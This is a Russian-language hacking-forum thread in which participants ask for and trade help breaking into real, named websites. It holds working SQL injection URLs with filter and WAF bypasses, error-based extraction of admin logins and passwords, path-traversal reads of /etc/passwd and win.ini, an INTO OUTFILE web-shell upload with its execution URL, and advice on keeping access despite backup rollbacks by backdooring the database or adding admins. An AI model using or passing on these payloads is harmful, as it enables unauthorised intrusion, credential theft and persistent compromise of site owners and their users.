http://fisher.spb.ru/news/message-bycatalog.php?category=2&water=-135+union+select+1,(select(@x)from(select(@x:=0x00 ),(select(null)from(information_schema.columns)whe re(table_schema!=0x696e666f726d6174696f6e5f7363686 56d61)and(0x00)in(@x:=concat(@x,0x3c62723e,table_s chema,0x2e,table_name,0x3a,column_name))))x),3,4,5 ,6+--+

er9j6@ said:
Как залить шелл, какой вариант? Пароли сбрутить не удалось

Code:
http://fisher.spb.ru/news/message-bycatalog.php?category=2&water=-135+union+select+1,(select(@x)from(select(@x:=0x00 ),(select(null)from(information_schema.columns)whe re(table_schema!=0x696e666f726d6174696f6e5f7363686 56d61)and(0x00)in(@x:=concat(@x,0x3c62723e,table_s chema,0x2e,table_name,0x3a,column_name))))x),3,4,5 ,6+--+



1. Исследование соседей.

2. Пошаманьте с /Club/contest/vne/forum/gallery/index.php?event=addform&gid=&se=-300154264

Можно ли что-нибудь сделать? максимум чего добился - это ошибки в


var/www/architek/data/www/architek.spb.ru/modules/Xsl/Xsl.class.php




http://architek.spb.ru/ready_projects/?marking_of_goods=&project_name=&property_id_2=&property_id_3=&floors=&property_id_13=&property_id_104_item_id_31=on&on_page=10&action=apply_filter

EksTasy said:
Можно ли что-нибудь сделать? максимум чего добился - это ошибки в


Сайт постороен на базе HostCMS. Ищите паблик эксплоиты, если не найдете- качайте исходники этой CMS (на сайте есть, правда с ограничением), и проводите анализ.

Интересует следующий вопрос:

1. Есть сайт site.com с шеллом на нём. Также, имеется доступ к серверу из под Root-а.

Проблема, конечно не совсем прямо относится к уязвимостям, но всё же, для проверки возможности редактирования файлов и правильности путей был выбран файл в корне x.php, содержание которого:


HTML:


При изменении текста текста в print-е - ничего не происходит.

При изменении имени файла на x1.php - файл становится не доступен по адресу site.com/x.php и становится доступен по адресу site.com/x1.php, т.е. всё вроде бы нормально, но текст в x.php и x1.php всё равно один и тот же

Дело, навряд ли в корневом htaccess:


Code:
AddDefaultCharset UTF-8

#RewriteEngine on
#RewriteCond %{REQUEST_URI} !/1.html$
##RewriteCond %{REMOTE_HOST} !^888\.888\.888\.888
#RewriteRule $ /1.html [R=302,L]

# compress all text & html:
#AddOutputFilterByType DEFLATE text/html text/plain text/xml

RewriteEngine on

# Redirects to www. version
RewriteCond %{HTTP_HOST} ^site\.com [NC]
RewriteRule ^(.*)$ http://www.site.com/$1 [L,R=301]

RewriteCond %{HTTP_HOST} ^site\.com [NC]
RewriteRule ^(.*)$ http://www.site.com/$1 [L,R=301]

RewriteCond %{HTTP_HOST} ^site1\.com [NC]
RewriteRule ^(.*)$ http://www.site1.com/$1 [L,R=301]

RewriteCond %{HTTP_HOST} ^site1\.com [NC]
RewriteRule ^(.*)$ http://www.site1.com/$1 [L,R=301]

# Send all requests except some to index.php
RewriteCond %{REQUEST_URI} !^/1/
RewriteCond %{REQUEST_URI} !^/2/
RewriteCond %{REQUEST_URI} !^/3/
RewriteCond %{REQUEST_URI} !^/4/
RewriteCond %{REQUEST_URI} !^/5/
RewriteRule ^(.+)$ index.php [L]

Order allow,deny
Allow from all

Deny from IP1
Deny from IP2

В чём может быть причина, если не в корневом хтаче?

В какую сторону копать?

Aniweste, скорее всего, кеширование либо на сервере, либо на стороне клиента. Вопрос банальный, но кеш чистили? Попробуйте "приватный режим" или другой браузер. И попробуйте заменить .php на .txt.

madhatter said:
Aniweste
, скорее всего, кеширование либо на сервере, либо на стороне клиента. Вопрос банальный, но кеш чистили? Попробуйте "приватный режим" или другой браузер. И попробуйте заменить .php на .txt.


Спасибо за ответ. Кеширование точно не на стороне клиента. Пробовал и другой браузер и очистку кеша.

Тогда прошу помощи в доп. вопросе - если кеширование на стороне сервера, то где располагается кеш?

В корне сайта нету папок, в которых были бы кешированные страницы, тогда где они могли бы быть?

Aniweste said:
Спасибо за ответ. Кеширование точно не на стороне клиента. Пробовал и другой браузер и очистку кеша.
Тогда прошу помощи в доп. вопросе - если кеширование на стороне сервера, то где располагается кеш?
В корне сайта нету папок, в которых были бы кешированные страницы, тогда где они могли бы быть?



Клац (http://mh-proxy.ru/blog/index.php?mod=read&id=22)

Скрипт сработал и повис на некоторое время сервак, но когда перезагрузился файлы откатились.

Искал-искал и так не понял - откуда они подгружаются.

Есть какие-нибудь идеи?

Так же скрипты из строки браузера не запускаются. Т.е. тупо не исполняются :O

Приходится использовать Execute: php 1.php

Вот.

А, ну и ещё одно. Как-то странно происходит процесс восстановления данных.

Обновляются файлы до каких-то непонятных времён, т.е. мой шелл восстанавливается из удалённых, а шеллы в других папках не восстанавливаются, но заливались все в одно и тоже время.

Заметил, что обновляются они по разному:

В одно время в .htaccess есть доп. строки


HTML:

Deny from all

Deny from all


В другое время их нету

Aniweste said:
Скрипт сработал и повис на некоторое время сервак, но когда перезагрузился файлы откатились.
Искал-искал и так не понял - откуда они подгружаются.
Есть какие-нибудь идеи?



а зачем тебе идеи? отредачит файл - запустил скрипт, сервак повис, ребнулся и вместе с ним и кеш обновился, что еще для счастья нада?

qaz said:
а зачем тебе идеи? отредачит файл - запустил скрипт, сервак повис, ребнулся и вместе с ним и кеш обновился, что еще для счастья нада?


Сервак повис -> ребутнулся -> восстановил все файлы откуда-то в их первоначальный вид.

er9j6@ said:
Как залить шелл, какой вариант? Пароли сбрутить не удалось

Code:
http://fisher.spb.ru/news/message-bycatalog.php?category=2&water=-135+union+select+1,(select(@x)from(select(@x:=0x00 ),(select(null)from(information_schema.columns)whe re(table_schema!=0x696e666f726d6174696f6e5f7363686 56d61)and(0x00)in(@x:=concat(@x,0x3c62723e,table_s chema,0x2e,table_name,0x3a,column_name))))x),3,4,5 ,6+--+



Через соседа, где file_priv Y, например поддомен uha .

Mq=off

http://fisher.spb.ru/php.php

Aniweste said:
Сервак повис -> ребутнулся -> восстановил все файлы откуда-то в их первоначальный вид.


та не, не в первоначальный вид, такого не может быть, песле перезагрузки он считывает файлы и помещает результат в кеш, тоесть в кеше окажутся последние изменения файлов

qaz said:
та не, не в первоначальный вид, такого не может быть, песле перезагрузки он считывает файлы и помещает результат в кеш, тоесть в кеше окажутся последние изменения файлов


Теперь сервак не падает.

Он выдаёт 408 на несколько секунд и дальше происходит одно из двух:

1. Либо восстанавливаются первоначальные файлы, либо

2. Ничего не происходит и новый текст так и не отображается

Помогите пожалуйста.

Не понимаю в чём дело.


Code:
http://dviu.ranepa.ru/index.php?page=..\..\..\..\..\..\..\windows\win.in i%00

http://www.lhc-facts.ch/index.php?page=../../../../../../../../../../etc/hosts%00

http://www.spaskrug-osetia.ru/index.php?page=../../../../../../../etc/hosts%00

http://klenovskoe.ru/index.php?page=../../../../../../../../../../etc/passwd%00

В чем может быть причина того, что на некоторых сайтах запрос:


Code:
order=1 rlike (SELECT (case when(1=1) then (select 1 union select 2) else 1 end))%23

всё время возвращает пустой результат (при 1=1 или 1=0).

Инъекция в order by.

XAMEHA, при числе записи = 1 всё нормально:


Code:
select 1 FROM (SELECT 2)x WHERE 1 ORDER BY 1 rlike (SELECT (case when(1=0) then 0x28 else 1 end))
# Вернет 1
select 1 FROM (SELECT 2)x WHERE 1 ORDER BY 1 rlike (SELECT (case when(1=1) then 0x28 else 1 end))
# Вернет #1139 - Got error 'parentheses not balanced' from regexp

XAMEHA, спасибо за ссылку, так работает:


Code:
order=min(0 rlike if((%s),1,0x00))#

никто не в курсе как через БД джомлы найти урл от сайта(кроме как искать сайт по контенту в БД), а то чёт ничего путёвого там ненахожу

qaz said:
никто не в курсе как через БД джомлы найти урл от сайта(кроме как искать сайт по контенту в БД), а то чёт ничего путёвого там ненахожу


Попробуй так:


Code:
SELECT name FROM #__menu LIMIT 0,1

int said:
Попробуй так:

Code:
SELECT name FROM #__menu LIMIT 0,1



не, там только титлы

qaz said:
не, там только титлы


А в колонке link?

SELECT link FROM #__menu

При фильтрации скобок в boolean based blind sql injection есть вектора?

int said:
При фильтрации скобок в boolean based blind sql injection есть вектора?


Заготовок, которые можно подставить, нет. Раскрутить возможно.

Обычно используются конструкции с union select, where, regexp и case (blind sql-injection),.

int said:
При фильтрации скобок в boolean based blind sql injection есть вектора?


Если имеются ввиду эти скобки <> то блайнд с полным перебором только можно воспроизвести

XAMEHA said:
Заготовок, которые можно подставить, нет. Раскрутить возможно.
Обычно используются конструкции с union select, where, regexp и case (blind sql-injection),.


URL Encode и Double Url Encode забыл упомянуть.

int said:
Как раскрутить такое:

Code:
SELECT * FROM table WHERE ... ORDER by table.field LIMIT $limitstart, $limit

где $limitstart, $limit - не фильтруются.


Новонайденный вектор:


SELECT * FROM table WHERE ... ORDER by table.field LIMIT $limitstart, $limit PROCEDURE ANALYSE (0, (SELECT 3 ORDER BY updatexml(1, concat(0x3A, version()), 1)))

psihoz26 said:
Если имеются ввиду эти скобки <> то блайнд с полным перебором только можно воспроизвести


Имел ввиду круглые, а не знак больше/меньше.

BigBear, пробовал - не проходит.


YaBtr said:
Новонайденный вектор:


Спасибо!

Вдогонку спрошу: какие есть популярные WAF (или модули для joomla), которые режут все спец символы, но не трогают sql операторы. Хочу покопаться в исходниках.

Приветствую,

Помогите раскрутить иньекцию


Code:
http://sochi-h ome.com/objects/novostroyki.html?types=1

На странице две запроса с инъекцией, один видимо с использованием Count(*) поэтому подобрать кол=во полей пеполучается, но есть еще MySQL error based injection method

Через него из проги Havij получил ДБ и Таблицы


Code:
Current DB: urchenko_home

Table found: blocks
Table found: catalogcats
Table found: catalogitems
Table found: cats
Table found: content
Table found: forms
Table found: formsdata
Table found: formsfields
Table found: general
Table found: menu
Table found: menus
Table found: photos
Table found: photositems
Table found: poller
Table found: poller_option
Table found: poller_vote
Table found: ratings
Table found: responses
Table found: users

Но далее Havij идти не хочет и не выводит поля таблиц.

Gulik said:
Приветствую,
Помогите раскрутить иньекцию

Code:
http://sochi-h ome.com/objects/novostroyki.html?types=1

На странице две запроса с инъекцией, один видимо с использованием Count(*) поэтому подобрать кол=во полей пеполучается, но есть еще
MySQL error based injection method
Через него из проги Havij получил ДБ и Таблицы

Code:
Current DB: urchenko_home

Table found: blocks
Table found: catalogcats
Table found: catalogitems
Table found: cats
Table found: content
Table found: forms
Table found: formsdata
Table found: formsfields
Table found: general
Table found: menu
Table found: menus
Table found: photos
Table found: photositems
Table found: poller
Table found: poller_option
Table found: poller_vote
Table found: ratings
Table found: responses
Table found: users

Но далее Havij идти не хочет и не выводит поля таблиц.


http://sochi-home.com/objects/novostroyki.html?types=1+and(select+1+from(select+ count(*),concat((select+column_name+from+informati on_schema.columns+where+table_name=0x7573657273+li mit+0,1),floor(rand(0)*2))x+from+information_schem a.tables+group+by+x)a)--+g

kingbeef said:
http://sochi-home.com/objects/novostroyki.html?types=1+and(select+1+from(select+ count(*),concat((select+column_name+from+informati on_schema.columns+where+table_name=0x7573657273+li mit+0,1),floor(rand(0)*2))x+from+information_schem a.tables+group+by+x)a)--+g


Благодарю. Но у меня опять ЧП


Code:
http://sochi-ho me.com/objects/novostroyki.html?types=1+and(select+1+from(select+ count(*),concat((select+login+from+urchenko_home.u sers+limit+0,1),floor(rand(0)*2))x+from+urchenko_h ome.users+group+by+x)a)+--

Выдает такое

Subquery returns more than 1 row

Gulik said:
Благодарю. Но у меня опять ЧП

Code:
http://sochi-ho me.com/objects/novostroyki.html?types=1+and(select+1+from(select+ count(*),concat((select+login+from+urchenko_home.u sers+limit+0,1),floor(rand(0)*2))x+from+urchenko_h ome.users+group+by+x)a)+--

Выдает такое
Subquery returns more than 1 row



http://sochi-home.com/objects/novostroyki.html?types=1+and(select+1+from(select+ count(*),concat((select+concat(mid(login,1,100))+f rom+users+limit+1,1),floor(rand(0)*2))x+from+infor mation_schema.tables+group+by+x)a)--+g

Новый серв - новый вопрос.

Есть уязвимость site.com/1.php?id=1'

Удалось до этого залится на сайт и получить шелл, а по нему узнать полный путь до каталога: /home/1/online/site/htdocs/ , но к сожалению шелл сразу удалили

При попытке чтения '/etc/passwd' - всё ок.

При попытке чтения '/home/1/online/site/htdocs/robots.txt' - пустое место.

Так и должно быть? Или я где-то намудрил?

И можно ли как-нибудь залить шелл? (file_priv=Y)

Можно ли в FROM задать имя таблицы, с которой нужно извлечь данные - динамически?

В том-то и проблема, что все папки на запись

Aniweste said:
Новый серв - новый вопрос.
Есть уязвимость
site.com/1.php?id=1'
Удалось до этого залится на сайт и получить шелл, а по нему узнать полный путь до каталога:
/home/1/online/site/htdocs/
, но к сожалению шелл сразу удалили
При попытке чтения '/etc/passwd' - всё ок.
При попытке чтения '/home/1/online/site/htdocs/robots.txt' - пустое место.
Так и должно быть? Или я где-то намудрил?
И можно ли как-нибудь залить шелл? (file_priv=Y)


Возможно MySQL крутится на другом сервере, а сайт на другом.

Ereee said:
Возможно MySQL крутится на другом сервере, а сайт на другом.


Да, к сожалению

имеется сайт на opencart и доступ к такому запросу, но все не так просто как хотелось бы, у нас только изменяемая переменная product_id с нашим значением.

Самое простое что получилось сделать, это выудить название таблиц из information_schema.

Хотелось бы добраться до названий столбцов таблиц и самих значений.


SELECT s.stock_id, sd.name, sd.address, sd.surname, s.seek, (SELECT IFNULL(SUM(qty),0) FROM oc_stock_product_quantity WHERE stock_id = s.stock_id AND product_id = '666') as qty FROM oc_stock s LEFT JOIN oc_stock_description sd ON (s.stock_id = sd.stock_id) WHERE sd.language_id = '1' AND s.hidden = 0 AND s.sp != 1 AND s.stock_id IN (SELECT st2s.stock_id FROM oc_stock_to_organization AS st2s LEFT JOIN oc_organization_to_store o2s ON (st2s.organization_id = o2s.organization_id) WHERE o2s.store_id = 0) ORDER BY s.sort_order

EksTasy said:
имеется сайт на opencart и доступ к такому запросу, но все не так просто как хотелось бы, у нас только изменяемая переменная product_id с нашим значением.
Самое простое что получилось сделать, это выудить название таблиц из information_schema.
Хотелось бы добраться до названий столбцов таблиц и самих значений.


Здесь все как нельзя лучше - инъекция в select_expr. Вы не указали, какие столбцы идут на выход. Если первые идут, то эксплуатация такова:


SELECT s.stock_id, sd.name, sd.address, sd.surname, s.seek, (SELECT IFNULL(SUM(qty),0) FROM oc_stock_product_quantity WHERE stock_id = s.stock_id AND product_id = '
-666')-555*-1 as qty FROM (SELECT (1) stock_id, (2) seek)s JOIN (SELECT (3) name, (4) address, (5) surname)sd --
') as qty FROM oc_stock s LEFT JOIN oc_stock_description sd ON (s.stock_id = sd.stock_id) WHERE sd.language_id = '1' AND s.hidden = 0 AND s.sp != 1 AND s.stock_id IN (SELECT st2s.stock_id FROM oc_stock_to_organization AS st2s LEFT JOIN oc_organization_to_store o2s ON (st2s.organization_id = o2s.organization_id) WHERE o2s.store_id = 0) ORDER BY s.sort_order


Должно сработать (при выводе 1, 2, 3, 4, 5 на их место подставляйте свои запросы). Если на выход идет только 6-ой столбец (555) или имеет место что-то ещё - напишите об этом, приведу соответствующую технику.

XAMEHA said:
Здесь все как нельзя лучше - инъекция в select_expr. Вы не указали, какие столбцы идут на выход. Если первые идут, то эксплуатация такова:
Должно сработать (при выводе 1, 2, 3, 4, 5 на их место подставляйте свои запросы). Если на выход идет только 6-ой столбец (555) или имеет место что-то ещё - напишите об этом, приведу соответствующую технику.




Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'FROM oc_stock s LEFT JOIN oc_stock_description sd ON (s.stock_id = sd' at line 8
Error No: 1064
SELECT s.stock_id, sd.name, sd.address, sd.metro, s.icon, (SELECT IFNULL(SUM(qty),0) FROM oc_stock_product_quantity WHERE stock_id = s.stock_id AND product_id = '37123')-555*-1 as qty FROM (SELECT (SELECT user_id from oc_user where user_id=19471) stock_id, (SELECT username from oc_user where user_id=19471) icon)s JOIN (SELECT (SELECT password from oc_user where user_id=19471) name, (SELECT email from oc_user where user_id=19471) address, (SELECT user_group_id from oc_user where user_id=19471) metro)sd -- ') as qty FROM oc_stock s LEFT JOIN oc_stock_description sd ON (s.stock_id = sd.stock_id) WHERE sd.language_id = '1' AND s.hidden = 0 AND s.sp != 1 AND s.stock_id IN (SELECT st2s.stock_id FROM oc_stock_to_organization AS st2s LEFT JOIN oc_organization_to_store o2s ON (st2s.organization_id = o2s.organization_id) WHERE o2s.store_id = 0) ORDER BY s.sort_order


видимо не хочет воспринимать знак комментария --, либо я что-то неправильно делаю.

конструкция вида -36103 вызывает ощибку "Товар не найден!".

помогите раскрутить http:// www.paid2earn.de/img/media.php?art=1'' MySQL error based

EksTasy said:
видимо не хочет воспринимать знак комментария


Чувствую я, что у вас в поиске скуля. Разделение по пробелу. Без пробела:


SELECT s.stock_id, sd.name, sd.address, sd.surname, s.seek, (SELECT IFNULL(SUM(qty),0) FROM oc_stock_product_quantity WHERE stock_id = s.stock_id AND product_id = '
-666')-555*-(1)as`qty`FROM(SELECT(1)stock_id,(2)seek)`s`JOIN(S ELECT(3)name,(4)address,(5)surname)sd%23
') as qty FROM oc_stock s LEFT JOIN oc_stock_description sd ON (s.stock_id = sd.stock_id) WHERE sd.language_id = '1' AND s.hidden = 0 AND s.sp != 1 AND s.stock_id IN (SELECT st2s.stock_id FROM oc_stock_to_organization AS st2s LEFT JOIN oc_organization_to_store o2s ON (st2s.organization_id = o2s.organization_id) WHERE o2s.store_id = 0) ORDER BY s.sort_order




noviks said:
помогите раскрутить http:// www.paid2earn.de/img/media.php?art=1'' MySQL error based


5*(SELECT 1 FROM information_schema.tables WHERE 1 or 1 group by mid(version() from rand(0) for 9e9) having min(0))

Duplicate entry 'version' for key 'group_key'

Все стандартно.

https://rdot.org/forum/showthread.php?t=245

https://rdot.org/forum/showthread.php?t=503

спасибо ) только не могу названия таблиц вытянуть (

5*(SELECT 1 FROMinformation_schema.tables WHERE 1 group by concat((SELECT ifnull(TABLE_NAME,0) FROM information_schema.tablesLIMIT 1), floor(rand(0)*2)) having min(0))

такой вопрос, есть шелл. права www-data но консоль не работает, можно ли както залится на другие папки ? если да то в какую сторону копать?

vikler,Инъекция в LIMIT после ORDER BY, MySQL >= 5.6, пока векторов нет.

XAMEHA said:
vikler,
Инъекция в LIMIT после ORDER BY, MySQL >= 5.6, пока векторов нет.


спасибо. не покажешь раскручено как запросить версию хотя бы и получить адекватный вывод?

Никак. Версия получается использованием условных комментариев:


Code:
/*!50610 test*/
/*!50611 test*/

то есть никак не раскрутить пример?

vikler said:
то есть никак не раскрутить пример?


Сегодняшними методами - нет. Здесь PDO_MYSQL, возможно удастся использовать именно это.

http://www.exploit-db.com/exploits/34025/

Вы про одно забыли - файловые права


Code:
http://press.otherimages.com/search/text/cat:CEL?pag=1&display=1 into outfile "C:\\\\WEB\\\\UBUNTU\\\\OTHERIMAGESPRESS\\\\control ler\\\\123.php" lines terminated by "111"

http://press.otherimages.com/controller/i.php?inoms=phpinfo%28%29;

Помогите обойти фильтр


Code:
http://www.mak-unatrac.com/index.php?pg=product_details&product_id=2+UNION+SELECT+1,2,3,4,5,6,7,8,9+--+

Unknowhacker said:
Помогите обойти фильтр

Code:
http://www.mak-unatrac.com/index.php?pg=product_details&product_id=2+UNION+SELECT+1,2,3,4,5,6,7,8,9+--+



_ttp://www.mak-unatrac.com/index.php?pg=product_details&product_id=2%0B/*!12345%75NiON*/%0B/*!12345%73ElECT*/%0B1,version%28%29,3,4,5,6,7,8,9+--+

5.1.72-cll

P.S: Вариант с JOIN'ом))


http://www.mak-unatrac.com/index.php?pg=product_details&product_id=2 /*!12345%75nion*/%0b(select * from (select 11) a1 join (select concat_ws(0x3a,user(),version(),database())) a2 join (select 3) a3 join (select 4) a4 join (select 5) a5 join (select 6) a6 join (select 7) a7 join (select 8) a8 join (select 9) a9) --

Unknowhacker said:
Помогите обойти фильтр

Code:
http://www.mak-unatrac.com/index.php?pg=product_details&product_id=2+UNION+SELECT+1,2,3,4,5,6,7,8,9+--+



Предложу еще свой вариант:


product_id=2 union+--+%0Aselect 1,version()/*!,*/3/*!,*/4/*!,*/5/*!,*/6/*!,*/7/*!,*/8/*!,*/9--


+ так же с join проходит

YaBtr,В твоем варианте нельзя использовать FROM (срабатывает WAF). Уwinstroolотлично получилось склеить цифры с union. Можно упростить:


PHP:
2/*!12345union*/select 1,user(),3,4,5,6,7,8,9--

Есть сайт http://site.com

Есть шелл на этом сайте и возможность получить root-а

Вопрос: как закрепится в системе, если раз в 24 часа происходит откат всех файлов из бекапа?

Вариант с подменой архива с бекапом - не вариант.

Mysql вертится на другом сервере.

Aniweste said:
Есть сайт http://site.com
Есть шелл на этом сайте и возможность получить root-а
Вопрос:
как закрепится в системе, если раз в 24 часа происходит откат всех файлов из бекапа?
Вариант с подменой архива с бекапом - не вариант.
Mysql вертится на другом сервере.



а тебе mysql не нужен для подмены бекапа, ты подменяешь файлы, а не БД, следовательно суёшь шелл в бекап.

да и вообще если уже ты рут, то добавь второго админа или тупо выключи откат.

Aniweste said:
Есть сайт http://site.com
Есть шелл на этом сайте и возможность получить root-а
Вопрос:
как закрепится в системе, если раз в 24 часа происходит откат всех файлов из бекапа?
Вариант с подменой архива с бекапом - не вариант.
Mysql вертится на другом сервере.


забэкдурь и БД и двиг.

http://raz0r.name/obzory/mysql-bekdor-dlya-windows/ для венды от Разора (старье но временами работает)

https://rdot.org/forum/showthread.php?t=677 отличный вариант от Типсей

Aniweste said:
Есть сайт http://site.com
Есть шелл на этом сайте и возможность получить root-а
Вопрос:
как закрепится в системе, если раз в 24 часа происходит откат всех файлов из бекапа?
Вариант с подменой архива с бекапом - не вариант.
Mysql вертится на другом сервере.


Тут вопрос в том, что вы имеете под "всех". Если вообще все файлы, то тут только атака на сервер с бекапами. Если все-таки не совсем все, то троянить надо то, что не переписывается. Также есть вариант с захватом всех возможных паролей и ключей.

madhatter said:
Тут вопрос в том, что вы имеете под "всех". Если
вообще все
файлы, то тут только атака на сервер с бекапами. Если все-таки не совсем все, то троянить надо то, что не переписывается. Также есть вариант с захватом всех возможных паролей и ключей.


Спасибо, что натолкнул на вариант с паролями - нашёл файлик с доступами

Теперь довольно глупый вопрос, на который я не могу найти ответ:

1. Имеется доступ к сайту через форум phpbb.

2. Имеется шелл к данному сайту, залитый через изменение шаблона.

Теперь суть проблемы - при бекконекте к сайту для последующей заливки шелла меняется пользователь.

Т.е.

При редактировании шаблона - есть возможность редактировать все файлы шаблона. Для редактирования этих файлов используется учётная запись на сервере User1

Но в случае, если напрямую из изменённого файла шаблона выполнить whoami (или сделать бекконект и залить файл в одну из доступных папок), то получаем ответ на whoami- User. У которого есть права на чтение всех папок, кроме двух + есть возможность чтения почти всех файлов.

Теперь вопрос:

Учитывая возможности phpbb (3.0.22) - есть ли возможность загрузить файл так, чтобы владелец этого файла был User1.

Aniweste said:
Спасибо, что натолкнул на вариант с паролями - нашёл файлик с доступами
Теперь довольно глупый вопрос, на который я не могу найти ответ:
1.
Имеется доступ к сайту через форум phpbb.
2.
Имеется шелл к данному сайту, залитый через изменение шаблона.
Теперь суть проблемы - при бекконекте к сайту для последующей заливки шелла меняется пользователь.
Т.е.
При редактировании шаблона - есть возможность редактировать все файлы шаблона. Для редактирования этих файлов используется учётная запись на сервере
User1
Но в случае, если напрямую из изменённого файла шаблона выполнить whoami (или сделать бекконект и залить файл в одну из доступных папок), то получаем ответ на
whoami
-
User
. У которого есть права на чтение всех папок, кроме двух + есть возможность чтения почти всех файлов.
Теперь вопрос:
Учитывая возможности phpbb (3.0.22) - есть ли возможность загрузить файл так, чтобы владелец этого файла был
User1
.


Насколько я помню, в пхпбб нет способа отражения текущего юзера. Энивей, тут также возможны несколько вариантов:

1) Наследственные права, когда все файлы в директории получают владельцем владельца директории.

2) Хитросплетения веб-демонов, изоляций и прочих некошерных вещей.

3) Юзер таки один.

Это что касается возможных причин. Попробуйте не аплоадить новый файл тем или иным способом, а вписать текст шелла в один из уже имеющихся.

Каким-то непонятным образом нашёл файл text.py в котором были данные для входа для пользователя sara.

Доступ оказался доступом по SSH

Зашёл и обнаружил проблему -

Из под шелла (пользователь user1):

cd home

ls -la
5 папок с датой за июль

А из под SSH(пользователь sara):

cd home

ls -la

3 папки с датой за июнь

Пытался редактировать файл из под sara - всё редактируется, но при заходе из под шелла - никаких изменений не видно.

Теперь вопрос - почему так? Почему разные даты и разное количество папок?

Вывод id

user1:

uid=510(user1) gid=500(user) groups=500(user)

user:

uid=500(user) gid=500(user) groups=500(user)

sara:

uid=501(sara) gid=501(sara) groups=501(sara),4(adm),10(wheel),500(user)

у кого заказать брутфорс xenforto или мыльника?

faysto said:
у кого заказать брутфорс xenforto или мыльника?


у васи из 8Б

Есть ли возможность обойти фильтрацию запятой в SQL иньекции?

к примеру запрос: script.php?id=22+union+select+1,2,3+--+

Запятые нужны, комментарии /!*,*/ не прокатывают, запятые останавливают SQL запрос.

Есть возможность крутить SQL как error-based, но все паблик способы раскрутки опять же требуют наличие запятых.

Кто подскажет, буду признателен. Благодарю за внимание.

Грабитель said:
Есть ли возможность обойти фильтрацию запятой в SQL иньекции?
к примеру запрос: script.php?id=22+union+select+1,2,3+--+
Запятые нужны, комментарии /!*,*/ не прокатывают, запятые останавливают SQL запрос.
Есть возможность крутить SQL как error-based, но все паблик способы раскрутки опять же требуют наличие запятых.
Кто подскажет, буду признателен. Благодарю за внимание.


Хм?

(select 1)a join (select 2)b ?

Грабитель said:
Есть ли возможность обойти фильтрацию запятой в SQL иньекции?
к примеру запрос: script.php?id=22+union+select+1,2,3+--+
Запятые нужны, комментарии /!*,*/ не прокатывают, запятые останавливают SQL запрос.
Есть возможность крутить SQL как error-based, но все паблик способы раскрутки опять же требуют наличие запятых.
Кто подскажет, буду признателен. Благодарю за внимание.


вывод через error based

BigBear said:
Хм?
(select 1)a join (select 2)b ?


Пример запроса через конструкцию union select можно? Или Error Based если возможно провести запрос без использования запятых.

Спасибо.

Грабитель said:
Пример запроса через конструкцию union select можно? Или Error Based если возможно провести запрос без использования запятых.
Спасибо.


Один из вариантов:


union select 1,2,3 == union select * from (select 1)a join (select 2)b join (select 3)c

UXOR said:
Один из вариантов:


Все получилось, спасибо вам за помощь.

Каким-то непонятным образом нашёл файл text.py в котором были данные для входа для пользователя sara.

Доступ оказался доступом по SSH

Зашёл и обнаружил проблему -

Из под шелла (пользователь user1):

cd home

ls -la
5 папок с датой за июль

А из под SSH(пользователь sara):

cd home

ls -la

3 папки с датой за июнь

Пытался редактировать файл из под sara - всё редактируется, но при заходе из под шелла - никаких изменений не видно.

Теперь вопрос - почему так? Почему разные даты и разное количество папок?

Вывод id

user1:

uid=510(user1) gid=500(user) groups=500(user)

user:

uid=500(user) gid=500(user) groups=500(user)

sara:

uid=501(sara) gid=501(sara) groups=501(sara),4(adm),10(wheel),500(user)

кто подскажет, что за ошибка? sql inj или нет?


Code:
hxxp://www.allstarpl.com/shopping/preview_template.cfm?filepath=/webimages/entertainment/previews/ssz/ssz103540.jpg&negno='ssz103540&category=ENTTAIN&orient=H&purchase=yes&p_id=30661d02edffdde46661a-3692319B-E3DC-6A06-525DA1B3F55F24E5_213056427

vikler said:
кто подскажет, что за ошибка? sql inj или нет?

Code:
hxxp://www.allstarpl.com/shopping/preview_template.cfm?filepath=/webimages/entertainment/previews/ssz/ssz103540.jpg&negno='ssz103540&category=ENTTAIN&orient=H&purchase=yes&p_id=30661d02edffdde46661a-3692319B-E3DC-6A06-525DA1B3F55F24E5_213056427





The cause of this exception was: java.io.FileNotFoundException: \\Webserver1\inetpub\wwwroot\webimages\entertainme nt\PREVIEWS\ssz\P-ssz103540xx .jpg (The system cannot find the file specified).


Чтение файлов же.

Пилите аналоги нуллбайта в жаве.

madhatter said:
Чтение файлов же.
Пилите аналоги нуллбайта в жаве.


ага, точно, спасибо!

Парни, такая ситуация.

Нашел уязвимый сайт, через sql вытащил название таблицы - admin. Узнал названия колонок - admin_name, admin_email,admin_pass, admin_level.

Пишу - http://www.site.com/pages.php?id=-15%20union%20select%201,2,admin_name,4,5,6,7%20fro m%20admin%20limit%200,1--

Ответ - Table 'site.admin' doesn't exist

Подскажите, что за ситуация и как быть?

billybonse said:
Парни, такая ситуация.
Нашел уязвимый сайт, через sql вытащил название таблицы - admin. Узнал названия колонок - admin_name, admin_email,admin_pass, admin_level.
Пишу - http://www.site.com/pages.php?id=-15%20union%20select%201,2,admin_name,4,5,6,7%20fro m%20admin%20limit%200,1--
Ответ - Table 'site.admin' doesn't exist
Подскажите, что за ситуация и как быть?


запрос должен быть таким примерно

http://www.site.com/pages.php?id=-15+union+select+1,2,concat_ws(0x3a,admin_name,admi n_pass),4,5,6,7+from+[название бд сайта].admin+limit+0,1--

[название бд сайта]- узнайте запросом

http://www.site.com/pages.php?id=-15+union+select+1,2,database(),4,5,6,7--

Cybersteger said:
запрос должен быть таким примерно
http://www.site.com/pages.php?id=-15+union+select+1,2,concat_ws(0x3a,admin_name,admi n_pass),4,5,6,7+from+[название бд сайта].admin+limit+0,1--
[название бд сайта]- узнайте запросом
http://www.site.com/pages.php?id=-15+union+select+1,2,database(),4,5,6,7--


Название базы radiesse

Table 'radiesse.admin' doesn't exist

Неужели никто не знает, что делать?

Еще пару вопросов, если позволите.

1. нашел уязвимый сайт, http://site.com/pages.php?id=-31%20union%20select%201,2,3,4,5--, выдает цифру 4

дальше пишу http://site.com/pages.php?id=-31%20union%20select%201,2,3,version(),5-- пишет 403 Forbidden

Почему?

2. Опять уязвимый сайт http://www.site.by/pages.php?id=7645

Перебираю колонки, сначала пишет he used SELECT statements have a different number of columns in query, дохожу до цифры 5, пишет Unknown column 'parent_id' in 'field list' in query. Если продолжаю перебирать колонки, опять выдает ошибку "неверное число колонок". Это иньекция или нет?

billybonse said:
Неужели никто не знает, что делать?
Еще пару вопросов, если позволите.
1. нашел уязвимый сайт, http://site.com/pages.php?id=-31%20union%20select%201,2,3,4,5--, выдает цифру 4
дальше пишу http://site.com/pages.php?id=-31%20union%20select%201,2,3,version(),5-- пишет 403 Forbidden
